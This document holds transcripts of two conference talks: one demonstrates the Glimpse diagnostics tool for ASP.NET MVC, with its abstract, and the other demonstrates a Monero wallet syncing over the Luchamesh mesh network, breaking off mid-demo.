know, as we all know, a picture tells a thousand words. And the other problem we were trying to solve is how do you know if a framework is actually executing the way that you expect it to? So let's say you're using ASP.DON.MVC, again, as a use case, and the routes are mucking up. How are you supposed to debug that today? Okay? Now, yes, there are some tools, Glimpse being one of them. But just, you know, in terms of the general problem space, how do you know? How do you know if you're using NIT framework and you have an N plus one where you're in a loop and you're executing the same sort of query again and again and again? These are problems. But what if it's possible? What if it's possible to answer these questions and come up with an experience that addresses these problems? That's what we did with Glimpse. Okay? So jumping back to the subway platform that I mentioned before, both Nick and I walked away thinking, oh, yeah, that's a cool idea. Okay? And, you know, if history was rewritten, maybe that's where that would stop. If that would happen, John Popper was running the open source fest at Mix 11, okay, over in Las Vegas. And just happened that both Nick and I were scheduled to go. And so we thought, hey, we've got this cool idea for a project. Why don't we try and do it? Why don't we try and do it? And so between the hours of like, what was it, like 10 p.m. and 3 a.m. for a period of three weeks, we knuckled down, we pretty much wrote the first version of Glimpse. And I think we stopped coding, what, like 10 minutes before we were due to present, okay? And as fate would happen, it was something that resonated a lot with people, okay? This picture of the world that was a lot more descriptive and a lot more context-heavy, okay? Then what our breakpoints in our log files give us. So what we were actually doing is trying to figure out, okay, how can we aggregate all of this data? So you've got thousands of different data points that you could possibly pick up on the server. How could you aggregate all of this data to present a picture that is actually meaningful to someone? Also, how could we bridge the client and the server? So typically we think about the client being very different from the server, but in reality, you know, a request starts on the client, has a whole bunch of things that might happen there, continues on to the server, and then carries back on to the client. They're not conceptually two totally different things. And particularly from a debugging and diagnostics standpoint, if something goes wrong there, if your tools force you to separate there, that's a problem, okay? Because you've got to, again, a little bit of that cognitive switch that I was talking about again. But mainly the fact that they don't, those tools, usually there's gaps between them, okay? And that's where those gaps fall, that we tend to run into a lot of problems. Also, this thought about context being important, what if we could provide framework level insights? So if we knew that MVC was running, and we knew that we could actually provide you with, you know, how the execution pipeline was running, or how the routes were being executed, pretty powerful stuff. But what if we could then do that for any framework? We could then do that for Nancy FX, okay? All of a sudden, this is becoming pretty compelling, okay? And there's not too many tools out there that actually do this, okay? They actually say, here's a set of tools that are specifically designed for the frameworks that you're using. Go out and pick the ones that you want to use, okay? And that's exactly how Glimps has done it. So let's actually have a look at a demo of what we're actually talking about here. So I'm going to run this live on this website, okay? Once I've showed you how to install it and getting running. So we can actually see some real case scenarios here. But in the meantime, what we actually have is this sample, and I'm just going to make sure that we're in the correct place. Yes, we are. And what we've done is Nougat was coming out at the exact, pretty much the exact same time that Glimps had launched. It may have come out a month beforehand. And it solved a lot of the problems that open source projects have typically had in the.NET space about how do you discover projects, how do you simply install them and all that sort of stuff. So we've piggybacked on top of that. And all you need to do is go manage Nougat projects, okay? And then you come in here and you're able to see all the packages that Nougat has available to you. Normally what you'd do is you come here and you type in Glimps and you'd be able to see the various Glimps packages that are available. But in this case, I don't want to take a risk on the network. So I've already got these ones available to me locally. And these are the packages that, let's say the core team of Glimps provide out of the box or publish. And so you can decide, well, am I using ASP.NET, MVC, they're further down just because of the way these are ordered. Or are we using entity framework or whatever else? And in this case, I'm going to say, right, I'm using entity framework 4.3 in this scenario. And if we actually had a look there, you'd see that it's installing the other dependencies. So entity framework project depends on ADO project, which depends on core. So this model that Nougat has of project dependencies. And as you can see, we've got ticks next to each of those. Next, what I'm going to do is go ahead and install glimpse.mvc3. Again, this is an MV3 sample that I happen to have open here. And it's got a dependency on Glimps ASP.NET and it's got a dependency on core. But because we already had core, it's gone out and already managed that for us. So I can come along here, close this. Glimps is going to give us a helpful guide to get started if we want to read through that, if that's our first time dealing with Glimps. But if we actually come in here, we can actually have a look in our references and we can actually see these are the DLLs that were just added to our project here. And Glimps is able to work with these and load up the packages that you require. So from here, all we need to do, I haven't made any other changes to this sample project except put in some Ajax requests to demo some stuff later on. And all we've done is installed that. Now Glimps is going away, or our application is going away, starting up building all the sorts of usual stuff that happens within an application when we compile for the first time. And we're now seeing our website. Let's see if we can actually make the res a little better here just so we can fit a little on the screen. Okay, so I'll zoom in again in a sec. But essentially, this is what the website looks like. We can navigate around. We can see different albums that fall into different categories. We can even go in and add to cut some of these albums if we want to. Pretty standard sort of setup like e-commerce setup. But what we can actually do, and I'll just make the go a bit higher again, is come in here and go to Glimps.axd. Can everyone see that alright? Yep, cool. And as you can see, we've got this beautiful page that we're presented with that has a couple of big buttons up there that allows us to turn Glimps on and off. And we can actually see that Glimps is telling us, hey, look, the cookies are turned off. Now, taking a step back, how does Glimps actually work? So before, when we installed Glimps, we made a couple of additions to your web.config to actually register Glimps and have it turned on within your development environment and also whatever default settings that you want. And we also registered a HTTP handler and a HTTP module. So for those who don't know, a module is something that allows us to get into the request pipeline. So detect when a request starts and detect when a request finishes. And a HTTP handler allows us to have this page. So those are the only additions that we make and they're all at a DLL level. So if you remove those DLLs or uninstall those packages, Glimps is totally gone from your system. So how do we know when to get involved with a request? By default, we don't go in and say, let's profile all your requests. You've actually got to make an explicit decision about, okay, I want to turn Glimps on and I want these requests that are making profile. Now, how we do that is we have a cookie that Glimps looks for on the server that says, the developer has actually told me to tell you server that it would like you to be turned on. And as a consequence of that cookie being there, Glimps will turn on. Now, don't get too worried about security and stuff at that point. We'll go into that later on as there's a whole heap of other checks that happen. For instance, even if you have the cookie, you've got to be a local host, okay, kind of like the errors page and stuff like that if you want to see full diagnostics. And that's what comes out of the box. And we can see that just here, if we scroll down, we can see that currently we have a policy enacted that is telling us that it's not going to work remotely with this current policy. So what we actually want to do is we can come in here, turn Glimps on, and we can see Glimps is now turned on. We've been told. And so what we do is we come back here and we can actually see Glimps down the bottom right hand corner of our page. And it'll stay there. I can navigate around any of these other pages and Glimps will just stay there. It's not going away. But what I can actually do is I can come in here at any point, open Glimps up and start seeing what went on to make this request. And what I can actually do is again navigate around and you can see that this is even happening fast enough that this panel looks as if it's just staying here. But in reality we're actually seeing different data. It just so happens that in this example where I've got the config tab that we're seeing the same configuration set up, which is what we would expect because we're hitting the same development server all the time. So what are we actually seeing here? So in front of you is obviously we're looking at the configuration tab and we're actually seeing the app settings that are in your web config. So who's ever had a problem where you might have gone from dev to staging or your test environment and all of a sudden things have stopped working and it's turned out it's because someone forgot to change an app setting or something like that. Yes, I'm sure someone has. Yes. Okay. So we all know what we're talking about. Or who's ever had the problem where a connection string might have been set to some sort of weird setting again in staging versus your development environment from what you expected and you're wanting to know how has ASP.onet MVC actually interpreted my configuration settings. So here's a great example that it's actually broken down this connection string and actually showing you this is how your connection string is actually being interpreted here. So we can actually see we've got default lock time of 5000 milliseconds. Pretty cool stuff. We can also start seeing how is our auth set up, our role management, custom errors, any modules and handlers that the system happens have registered at an app settings point of view or from a configuration point of view rather. We can also go and see what does our environment look like. So at a basic level this will tell us, you know, I'm on machine Anthony here and I've got eight processes apparently and this is when I last started and my operating system. But more interestingly, I can come in and actually see something like what the exact version of.NET that I'm actually running. Again, how many people who have run across the problem where you might have deployed to staging again and you've actually got something weird going on and it turned out to be that you have mid-words missing a service pack, you know, maybe ASP..NET 3.5 service pack. Anyone have that problem? Okay, cool. This is where the system is actually telling you and where you can go and where you can trust that this is the information that the system is actually based off. And this is where it's actually running. And we can also see that we're in debug mode at the moment. So I'm sure less people have run into this problem but I know people who have run into issues where you might have attached a remote debugger to a server and not detached properly. Okay, so your server is still in debug mode. It can be a problem. But more interestingly, I personally think, okay, is this time zone information. So again, how many people have had the problem where you might have deployed to your server and all of a sudden time seems to be going weird and it turns out that on your local box you are taking daylight savings into account. Okay, and on the remote box it's not set to take daylight savings into account. Anyone had those sorts of time zone issues? Okay, you know what I'm talking about. We can also see here that we've got these various application assemblies listed. So it's going to tell you these are the assemblies that ASP..NET has actually detected and loaded into your system. So again, I'm sure people have run into problems where you might have thought you've deployed a DLL and think that it's actually been picked up by ASP.NET but it hasn't been. Here we can go and actually see what's actually being loaded and what versions of those DLLs have been running. I can verify that I am actually running NIT framework 4.4 at the moment. I know that. I can verify that. And we can also come down here and see what other system assemblies happen to be loaded as well. So another thing we can actually do is we can come along here and have a look at the request tab. Now this request tab is telling us what was sent to the server and you might be telling me, but Anthony, I can already see this with the client side development tools or Fiddler or whatever else. This is different. Again, I'm not sure how many of you all have actually run into this use case, but if I'm here and I'm standing on the client, I send the request off. Yep, I go through Fiddler or whatever else I happen to be using. There's a lot of other things between you and the server. And as it happens, some of those things tend to play around with the request that you've actually sent. So this is telling you, from the server perspective, this is what was actually received. So you might have had some weird load balancer thing, adding on headers or redirects or whatever else. Here we can actually see this is the information that was passed to the server. And I can verify that and I know that. So taking us a step back from the more general tabs that we have, and let's start talking about MVC. How many people have at least created an MVC project and have worked with one a little bit? Okay, cool. So a typical problem that we run into with ASP.NET MVC is knowing exactly how the execution pipeline was executed. And what I mean by that is when did the filters run? When did my action run? When did the filters pick back up again? And then when did any of my child actions and whatever else execute? Has anyone ever wondered exactly which order all of that stuff happens in or run into a problem where it didn't execute the way they expected? Yeah, cool. So what we actually have is this execution tab, which actually shows us this is how MVC actually executed that pipeline. So we can see the first thing it did here was actually run an authorization filter. And then the next thing it did is actually ran the executing pre-filter on our action. And we can actually see where our filters, if we had more custom filters in here, would actually execute in relation to anything else. Because these days we've got global filters that we can have, we can have control level filters, and we can have action level filters. And all of those are just attributes. And those attributes don't get picked up by static analysis tools, or at least currently, and able to tell you this is exactly how this request was served. And this is really important because a lot of these filters can change depending on how your environment is set up or how the filters are registered. So we can actually see these green ones is actually when the store controller browse action ran. And I can tell you that it took 11 milliseconds, or 11.81 milliseconds, because those extra two decimal places are really important. We can also see that we hit these other child actions that helped make up the page. And we can see that they made up the majority of the time in our request. So these are the filters that are present in the system, but they don't actually do much by default. It didn't impact us in too big a way. Another one we can actually look at is the views tab. So this is telling us like for the execution tab, and where the execution tab tells us how the system executed, this is telling us how our views were resolved. So it actually turns out that it's a bit of a discovery process that MVC goes through to resolve which view should I actually use. So we can see here, to start off with, we were looking for the browse view in the store controller, and it's not a partial view. We know that up front. And at first, it looked in the view engine, the webforms view engine. And this is the cached. So I was looking the webform view engine's cache to see, do you have this result? And it said, sorry, I don't. Then it went to the razor, repeated a view engine and repeated the same question. And it said, sorry, I don't. Then it went back to the webforms view engine and actually said, do you have it at any of these locations? And again, the MVC webforms view engine is going, no, I don't. And then finally, we got to the razor view engine and it said, yes, I can answer your query. And that's where we've actually got in. And we've now know that this is exactly the view that the system worked with. And we can even tell the model types and whatever else that we were actually passed through here. Now this is really interesting because not only are we getting insights into how MVC's making its decisions and particularly if you're doing non-standard things in this area, how that's all operating. One thing this is telling us is that we've got the webforms view engine in here and MVC is actually going through and checking the webforms view engine during its resolution process. And as it turns out, this project doesn't have any webforms view pages in it. So it's never going to answer on those. Yet how MVC ships out of the box is it's going to ask that question every time. Now, yes, MVC does make some optimizations there, but we can make an optimization too in actually removing that view engine from our solution. And that's something that's pretty easy to do via code. Another really interesting tab is the SQL tab. So we can actually come in here and have a look at the SQL that actually made this page or that was actually executed to provide the data to make this page. And as it turns out, you might have seen we installed the entity framework package so you can actually see this is how we're getting into the information and I can actually see these queries. And some of the minor things that we're doing, but I still think is niceties, is by default if we were profiling this stuff, we would just see the parameter that was used. We've actually gone through after that and replaced that with the actual parameter to display here so that what you could actually do is if you wanted to come through, copy and paste that SQL query, put into SQL Server Management Studio and actually execute it. I know it's a minor thing, but it's pretty cool, I think. And we can actually see more formally what the values were that were actually used there, how many records were returned, how long that took, what offset that was from the beginning of the request, and we can actually see how long our connection was open for and which connections or which commands belong to which connections because a connection can have many commands. It's not a one-to-one relationship necessarily. So I can come along here and I can see connections per command and I can see, okay, I've got my first one, that's nested here, but wait, I then created another one. But it looks like I'm doing the same sort of stuff as the first connection and I come down here, oh wait, I've created another connection. So I've actually created three connections each with one command, so three commands as well, when maybe I could now go back and say I actually want to optimize this and I'd actually prefer to have one connection executing each of those commands. So this is the sort of empowerment that we're starting to give you. Now one thing you may have realized coming along here is that we're collecting some timing information as we go along. And timing information can be really powerful in terms of letting you know where you're spending your time. But it's like, well, what does 30 milliseconds or whatever else mean to me? Or where did this request actually happen? And we kind of asked ourselves the same question, so that's when Timeline was born. And what Timeline does is it actually takes all the events that were generated to make this page and put it out in a visual format that actually allows you to get some context on how your system actually ran. It's like this waterfall. And you may see some inspiration here from Chrome development tools kind of event flows. And we can actually see that here's this controller, store browse, and I can actually see, well, part of the way into that request was when the connection was actually opened and that connection had this one command. Ironically, one thing we can also show in the SQL tab, which isn't represented in this project, we can actually show you transaction boundaries as well. So if you've got explicit transactions around various commands, we can tell you this is when it was opened. You then executed these series of commands, and this is when it was closed, again, making sure that your expectations are being met. We can do that because we have that framework level context and insights. Lastly, one other interesting thing that we provide, kind of, bring to the table is this trace tab. Not quite as sexy as some of the other tabs we've looked at, but does anyone remember trace.axd from back in the day? With web forms applications, you could actually turn it on and you get a log of which control, which controls were executed and which order and whatever else that they were executed in. When we were standing on that subway platform, we were like, that was kind of cool, like, kind of sucky visual implementation, but kind of that thought that we can filter down to those exact trace statements that were used to create the page that we were actually seeing here, they were onto something with that. So we have brought that back here so that you can actually go within your system and you can actually do a diagnostics.trace and you can actually log out to this panel. So we're not asking you to do a glimpse.trace or anything like this, it's just system stuff that we can actually hook into and then show you here. But the other interesting thing that you can do here is, let's say you happen to be using logfinet or nlog, who's using one of those frameworks? Anyone? Cool. You could actually set those up to output to the trace writer. And if you do that, it will show up in this tab. So you'll actually be able to see all of those trace statements and all of your existing infrastructure show up here filtered to this request. Again, save you having to trawl through log files to try and pick out what were the trace statements that actually built this request. So there's a few other different tabs here. I'm not going to go into every single one of them, but there's two left that I want to show you. We don't really build modern applications these days or modern websites without some sort of Ajax core. Who's in the websites that they may have been a part of or built in the past? Has anyone, I was going to ask a question differently, but who's actually used some sort of Ajax inside of their sites? Okay, I think that's pretty much anyone. Does anyone want to be the person to say, you know, they've rebelled against Ajax? Anyone? I might give you something free. It might be a slap, but that's all right. No? Okay, cool. So what we actually do is we have pages that use Ajax, and you can actually see what we've done is we've altered this sample here that John Galloway built to have this little news ticker that spins around in the background pinging the server every 10 seconds for a new news article. Not rocket science, I know, but I prefer spending my time building glimpse rather than much more advanced samples. So what we can actually do is come in here and actually click on the Ajax tab, and we can actually see the Ajax requests that are actively going on on this page. And so we thought, I think I might have mentioned to Nick after we started, but still inside of that five weeks. Wouldn't it be cool if we could actually show all of this data that I've just showed you for all of the Ajax requests that have gone on to make this page? Why does it have to be restricted to the actual main page that you're actually seeing here? And he was like, that's a good idea. And I was like, thanks, B1. No one's seen banana in pajamas. That's right. So what we can actually do here is I can come in and click on inspect, and now our context is actually switched. And you haven't seen too much of a visual change here. We're going to work on improving this. But if you bear with me, we were actually now contextually switching. We're looking at an Ajax request. And now we're looking at news. So if I switch back, that was what the old request looked like. And we can see that that's what we're looking at. But I'll come back to Ajax and actually select one of my requests. We can see that context change. And I can actually come into, let's say, the routes tab. And I can actually see that this is the actual control of the route that was selected. And these are the parameters that you've passed in. So even though my routing table had home and index as the default, according to what was passed in by the query string, home and news were the actual ones that were picked up. So it's starting to get really powerful. And I can go back here and reset and actually prove to you that if we come back here, back to routes, you can see home and index. That's pretty cool. So who thinks that's pretty cool? Can I get a couple of hands? Yeah, cool, cool. So the other thing I want to show, this is a bit ambitious. Okay. So and it may not work. So you have to bear with me, but I think it's going to work somehow. So I remember probably, when would have it been? Maybe three days before that release that we did in Las Vegas. And I was sitting somewhere with Nick and I said, wouldn't it be cool if we could have glimpse for the mobile, so that you could actually see glimpse pop up in the bottom of your mobile phone and actually flick through the tabs and see the data. Now, who thinks that would be a good idea? Cool. I like the enthusiasm for the idea. But one thing we thought about was I don't want to look at all of that data on this little phone. Okay. Because that's a hell of a lot to fit on that little phone. Okay. So what we decided to do, and this feature was kind of facilitated by some of the stuff we were doing with Ajax, is keep the phone idea as in I want to keep profiling it. But I actually want to see that data on my computer here. So I'm doing mobile development and I'm here on my computer. So I start it up. I then pick up my phone and go to the web host. I actually want to see that data within glimpse here. Could we do that? Let's find out if it actually worked. So what I'm going to do is I'm going to come back to this page over here and let's just go to this page as a starting place. I'm going to minimise this a little. What I can actually do is I can come to this history tab. Now, if you forgive me, there's already a bit of data in here because this page has been sitting in the background. But what we can actually do is see that as we navigate around, and I actually want this one, that our request will actually pop into this page. Okay. So can we all see that these requests are stacking up here for the navigation that I'm making? So what I can actually do is I can come to any of these and you can actually see we've even got Ajax requests in here. Is Ajax, this one's true. I actually want to go back to this request that I made a couple of minutes ago and I actually want to click on it and I can actually start inspecting that particular request. Same deal. If I go to routes, I can actually see store details, which isn't I'm on store browse at the moment. So I can see this historical request. So that's cool in of itself because I can let's say you navigate it around something weird happened. You moved on a page. It resolved itself and you're like, hey, wait, what went on? I want to go back and see that. So we allow that. But then what I can actually do is, and this is where the crazy live demo isn't going to work or isn't not. So I can actually come in here and you're going to have to bear with the latency. But did anyone see a change there? So keep an eye out again. Anyone see another change? What we actually did is this safari came up. So what I'm actually doing here, and as long as our speeds keep up, I'm actually inspecting in real time what I'm actually doing on this mobile phone. And now I can change the name of these sessions if I wanted to actually be iPhone, but I can actually see that. I think that's really cool. Who thinks that's cool? Yeah, useful? Yeah, okay, cool. So what I'm actually going to do is I'm going to prove to you that this is coming from the iPhone and I'm going to prove to you that it's doing that by going over to request and actually saying that the user agent here is indeed iPhone. So what we've just done is we've broken all rules of the universe here and we've actually said I want to collect all of this data that's happening on this remote device, okay, and I want to see that server data, that server context displayed here in this page for me now. That's a fairly big leap forward in terms of how we think about debugging diagnostics and how we think about all of this context. Another interesting use case that's facilitated by this and you're going to have to stretch your thoughts a little bit for this and I think someone else has just popped in here. Let's see if we can watch them navigate around while I'm talking. What we've actually done is facilitated pretty much remote debugging. Now, has anyone actually tried to do like breakpoint remote debugging before? Of those people, keep up your hand if you actually thought it was fun. Okay, good, I'm not going to have to slap anyone. So what we've actually done is we've facilitated remote debugging and what I can actually do is think of this for a use case. One of your customers rings you up and says, hey, I've got a problem and you've gone, okay, cool, replicate your problem and they're talking you through, trying to send you screenshots, all of this sort of stuff. What I can actually do is I can come in here and go, all right, I can watch you in real time. You can click a button somewhere in your website and turn glimpse on in a right only capacity so they can't see any of this data. But then I can sit here as a developer and actually inspect their traffic and actually see what's going on with their requests. Okay, and we've got a circular ring buffer so we only keep the last 50 requests by default. So in this case, it hasn't actually been able to find that historical request because there's other traffic going on on this side at the moment. But that's something that we can actually do and that's really interesting. So coming back to what we're doing here, let me see if I can get this right, shift F5. So moving on, oh wait, one more thing. Okay, I almost forgot this, maybe not because I built a slide in about it, but anyway. One of the insight that we had was that all of this information is really cool. But in some ways, you've got to still try and go through and find the information that you're after. And we all know though that there's a couple of these data points that are really important and that we would really care about on a more frequent basis. So we did that and what we came up with was what you're seeing down the bottom. So you would have seen before when I brought it up in localhost, you would have just seen the icon and you would have seen a little few colored bars. But what we've done here is we've got HUD, heads up display, and what we've actually got is all the most important bits of information from the requests that we've actually made. This is really important because what we've actually done is we're now seeing on every page that we navigate to how long it took, how long it spent over the network, on the server, what control or an action it actually hit. We can see how long the DB queries took, how many queries they were at a glance, so I can see if any page is acting weirdly. And what I can actually do is I can come into any of these and actually hover over them and get more information. And probably one of the most interesting ones in this case is I can actually see how long the various key events inside of ASP.NET took and what queries were associated with those different actions. I think that's pretty cool. Who thinks that's cool? Yeah? Okay, cool. Who thinks they might actually use that? Okay? Yeah, okay, thought so. So that's HUD. So when I asked before if people hadn't seen HUD, that's why I was a little bit excited when people said no. And what we can actually do here is let's say we come across to here and I actually want to go back to the home page. And one last thing is we can actually see our AJAX request showing up live here in this toolbar without needing to go anywhere else. I can see them as they happen on the page. And I can actually get more information down here so I can actually see how big the payload request, whether 200s or 400s or 500s or whatever you may have, gets or posts or whatever else. Now, this is still an initial cut of this, but eventually you'll be able to click on those and you'll actually be able to drill down into the more detailed information on this stuff. This is brand new. It's only been released for about three days now. Okay? And we think that's pretty exciting because this is a vision of our systems that we've never had before. Okay? So, oops. Okay. So, what do we have now? Okay? Just quickly before I move on, who likes what they've seen in general? Okay. Cool, cool. Who's actually going to go off and download Glimpse Now and put into their project? Okay. Good to see. Good to see. I've been, I'm doing my job well. Okay? So, a realization that we've had, okay, and you guys may have already connected the dots, but what we have is information at different levels. Okay? And imagine, if you will, that previously breakpoints and log files was like the one foot view of debugging. Okay? So, if I wanted to get down and actually have a look at what was actually going on down here, that's what I would actually use breakpoints for or log files. But let's say I said, let's hop up in a plane and fly the 10,000 foot view over my code or over my executing system. What would that look like? And to us, okay, that looks like HUD. So, that looks like that bar down the bottom of your page, which is pulling out all the most important bits of information. Next, if we said, well, what happens if we fly that plane a bit lower? What does the landscape look like? That looks like timeline, because we're able to grab all of the key events, represent that on the page geographically, and actually show you what's going on. Then we have the 5,000 foot view, which is the majority of the rest of the tabs. Then the 2,000 foot view, which is like the trace tab. Okay? And then we can go, we follow that all the way down to our current existing tools, okay? Like breakpoints and log files and stuff like that. We've also had a realization that we have different modes of development that we're in, okay? Different stages of our lives. So, who at one point in their life was a learner with ASP.com and MVC? Everyone, okay? Who's been a debugger? So, who's trying to figure out what was going on with any framework or some part of their system? Okay? And who's had none of those problems and they're just developing awesome stuff? I'd hope everyone would put their hands up. Can I get a couple of hands? Awesome stuff. Who's been developed? Okay, one guy up the back. You're my friend. Okay? So, what is valuable about this? Okay? If we recognize that we go through these different modes of development, what it means for Glimpse is that when we're thinking about what features and whatever else to provide, we can provide features that are targeted to those different modes. So, something like the execution tab is fantastic for when you're learning so you can actually get a visible picture of what's actually going on. And I know we've had people we've trained, okay, back when we were still working in New York, where the week before we tried, you know, the slide approach to teaching them about MVC. But then we went and showed them Glimpse and they're like, smack in the head. I understand now what you're actually trying to say, okay? And they can actually see adding that filter to that action is where this thing is actually picked up. Try putting that all in paper or trying to put breakpoints everywhere to try and trace that flow is really difficult. That also happens to help when you're debugging so you've got a problem. But the other realization is that when you're in the development mode, i.e. you don't currently have a problem, but you're just trying to, you know, do development, is that there's still key information that Glimpse gathers that is important to you. And that's where something like HUD comes in and can actually show you all of that information. Another important realization is that Glimpse has turned into a diagnostics platform and that there is actually a need for this platform out there in the wild. So if you take away the tabs that Glimpse provides out of the default, so provides by default, so a game rid of MVC, entity framework, all of this sort of stuff. What we have is this cool icon that sits in the bottom right hand corner that you can click on that opens up and has no tabs. Okay? Yay, big deal, they say. But what we actually have on the back end is a mechanism by which you can actually easily create your own tabs and see those actually pop up in your system. And I knew we were starting to cut time close, but I am actually going to show you this. Okay? And if hopefully we're all going to work okay. So this is basically something that I worked on a little earlier just because I thought I might be pushed for time. So I'm actually going to stop this and we're going to come in here, File, Add, Class. Okay, and we're going to call this Glimpse Module tab. So I actually just want to see all of the modules that are currently registered in the system because for me that's super important. Okay? So what I actually do here is I can come in and I can actually just inherit from ASP.net tab, okay, which is a Glimpse concept. If we have a look, Resharp is going to tell me that's from Glimpse Extensions. And if I actually implement this, it's going to tell me that you need to implement these two methods. One is the name that we want our tab to have. And so I'm actually going to call that Modules. Okay, and the other one is an object. That's all Glimpse wants me to do. Just please give me an object. I'll figure out the rest. So what we've actually done, and I'm not going to get you guys to watch me code, but if we come along here, what we've actually done is the first thing, we're going to pull out the HTTP context because that's the thing that can give us access to the modules. We then go into Application Instance, pull out the modules. We create a result object that we want the list to go into. And then we create a list of these anonymous objects with an index of how they're ordered because it actually turns out Presidents of Order is important here. The name and what the data type is. So not Rocket Signs. I hope we'll all agree with that. So I can actually now come in, start debugging this. That's all I've done. I haven't registered anything in an XML file or anything like that. And what Glimpse actually does is it goes away and is able to pick up this tab. And what we can actually see is that here's this tab. It shows up in here, and there it is. We've just gotten data out of our system. Now I agree this is a fairly trivial example, but imagine you've got a shopping cart or something in your e-commerce system or some sort of A-B testing system that you've homegrown or whatever else. And you want to get access to why is something showing and something else isn't. Or what is actually in my shopping cart. Or what current security policies have come into effect to display me the page that I'm actually seeing right now. This is the sort of stuff that when we start thinking about a platform, we can actually get access to or that we would start thinking about. And the other thing that we start thinking about is that why don't we have different plug impacts for different frameworks. So that's something that you can do yourself, but just like what we've seen with MVC and NE framework, we could start having that for inhybernate. Or we could start having that for ELMA. I don't want to see any exceptions right there in my page. And this is really important because if we as a community decide that these type of diagnostics are important, let's invest together. Let's not reinvent the wheel on every single different platform and framework and whatever else to figure out how we're going to show diagnostics information. Let's band together and make that happen. So that in essence, it facilitates a multi-framework ecosystem. And we have information that is targeted at understanding. I.e. log files in my opinion aren't necessarily targeted at understanding, they're more targeted at confusion. How confused can we make this person? So target understanding. We also have something that's cross-browser, cross-platform and full stack. So not that I showed it today, but if you think that this framework stuff is important and this framework level insights is important, it turns out that's important on the server, but it's also important on the client. And what if we could have client tabs as well? That show how backbone or knockout or stuff like that is operating. And as it turns out as well, the client is actually fully decoupled from the server. So we actually have different implementations on the server back end. So ASP.net is one of them, PHP and whatever else. So closing up now, what's this all really about? I think this is, we're trying to save you time. Trailing through log files or scratching your head over breakpoints isn't what you're about. So we're trying to take that heavy lifting off you and actually show you in plain English what's actually going on here. In turn, that saves you money because you're not having to spend your time trying to figure out how the system is working or what's going wrong where. And in the end, it's also about making you kick ass. Because if we can help you get to this information sooner and this understanding better, it's only going to make you that much better of a developer. And be able to come back to your clients and say, look what we've been able to do or look at I've solved your problem. So we've talked about the current approach, the fact that something's missing. What important questions we should be asking ourselves? How Glimpse solved some of those problems? We've had a look at some demos. We've now had a little bit of a look at what we've got. And what is this all really about? At the end of the day, I think I've already convinced you to try it. But this is where I was going to do my real pitch to tell you to try it. So I'm going to skip that. Just try it. Give it a go. Virtually no harm. I said virtually. No harm can come from trying it. It's just DLLs. It's not going to break your system. It's at getglimpse.com. Really easy to remember. And Glimpse is open source. All of this stuff that you've seen, we're not charging for it. Nick and I, we started now free time. We decided these were things that developers needed. They're not optional. So please go ahead and try it. If you like what you see, jump in. This is only made possible by the efforts of, I don't know, 50 to 100 different people who have contributed over the last two years to make Glimpse what it is today. So if you want to get involved, please help out and give it a go. Go forth and be awesome. Please leave feedback. Okay. That's really important. And thank you very much for coming along. Oh, and one more thing. Please stick around. If you want to know more about getting involved with open source and how open source projects and stuff like that operate, Nick is actually going to be talking about that coming up next. So thank you very much.
|
With the state of diagnostics on the web being where it is, we are left needing to perform a job that is much harder than it should be. Too often, the tools we are provided with only show a part of the picture, leaving us to simply guess what might be happening behind the scenes. Glimpse is an open source project that aims to change the way we think about diagnostics and the frameworks we interact with. After releasing Glimpse at Mix 11, Glimpse has become a tool that is used daily by tens of thousands of developers around the world. Learn how to use Glimpse to reveal what is happening within your ASP.NET MVC and WebForms sites. See what tools are included out of the box and how you can easily extend it to suit your needs.
|
10.5446/50666 (DOI)
|
Hello, thank you to the Monero Village organizers and the Monero community for inviting us to be part of this amazing conference and the opportunity to show you what we are doing at Luchamesh. We are going to show you a demo of the Luchamesh, which is a community-driven open source software and hardware project. It started two years ago with the idea of making a decentralized censorship system network for payments and communication without internet. For disaster-hit countries and privacy-concerned individuals and groups who would like to keep their privacy and their communications and payments as private as possible. Mesh Networks has existed for decades now, but we focus our efforts on making one that doesn't rely on seed nodes or bootstrap nodes or servers nor intermediaries at all. Each Luchamesh node is independent and can keep enough information for it to be able to deliver messages through path and hops to these destination messages and data without internet at all. Well, Luis, who is the CTO, will show you a demo of a Monero transaction that is going to take place from a completely off-the-grid computer that is only connected to the Luchamesh network to a remote Monero node. Luis? Good afternoon and welcome everyone. I would like to start by thanking all the Monero community and especially to those who supported us through Monero's CCS proposals. And Randy was talking, I mean Luis, the CTO and co-founder of Luchamesh. And I would like to show you a demo running the Monero Graphical User Interface and the Monero demo in the same network, in this case in the Luchamesh network. And you can see in the picture here is the environment. On the right side, you can see the server with two network interfaces. One is connected to the internet and the other to Luchamesh. The Monero work daemon is running on this server. The network interface for the Luchamesh is this one. And on the left side is my laptop. Represent them as N1. Using the launchpad, the launchpad is this red board, as you can see in the webcam. And this red board is the network interface for the Luchamesh using this address. Between them, we have a node whose network address we don't know, but we don't care either because it just helps to fit the path between main laptop and the server. Okay. Shut up the other microphone. You have two of them, I think. Or is it, it is down, right? I don't know if it's... What? No, check the other microphone in case it is in the other computer. I don't know if it's working or not. It's closing the microphone in the other computer. Okay, okay. Continue. Yeah, sorry. Someone wanted to do that. Okay. What? Okay. So, we can start with the terminals. On the right window, I have an open terminal to the server running the Monero server. And I have configured the network interface for the Luchamesh. We can check. Okay. So, the interface is this one. And in the left side, I need to check. Okay. This is correct. Okay. Before executing the Monero GUI or the Monero graphical user interface, we must make sure we have the configuration file ready with the server address. This is the Monero Confine. Okay. This is the address of the Monero server. And this is the port. So, we can start the GUI. Okay. Check. Check. Get waves. Okay. The white is synchronizing. This can take a while. Okay. And it's ready. So, the next step is, Randy, can you send me some Monero, please? Sure. So, now that you have your wallet synchronized over the Luchamesh to a remote Monero, he can now create an address to get payments without having to have any connection to the Internet. He's only connected to the Luchamesh through the tool code device. In this case, he's using a Launchpad, which is for development. But you can see one of the revisions of the hardware we are doing there also in the webcam. So, he's now going to share with me Monero address to get payment. So, what we are exactly, copy and share, what we are going to see now is that I myself, who are connected to the Internet, I'm going to broadcast a transaction to the receiving address Luis has shared with me. And the Monero daemon, which Luis is running on server connected to the Internet and also to the Luchamesh, we'll see the transaction that I'm making on the Internet. I'm going to set this to a good number so you can see it. Okay. Send. Now, my transaction is being sent over the Internet. It's done. Enter password. Okay. Send. Now, what is going to happen is that the Monero daemon that Luis has connected to both the Internet and the Luchamesh, which is peer-to-peer mesh network, is going to see this transaction on the Monero mempool. And it knows that this transaction belongs to this user who is connected to the Monero daemon over the Luchamesh only. So, now when the transaction has been broadcasted to the Internet and the Monero daemon running on the server, see it, it's going to populate this or share this information with the user. Transactions. Yeah, it's sent. Let's see. So, well, you can see there. Yeah, it's running. What's the noise there? There you can see in the background of the user interface that, in the terminal, you can see that the interface is communicating 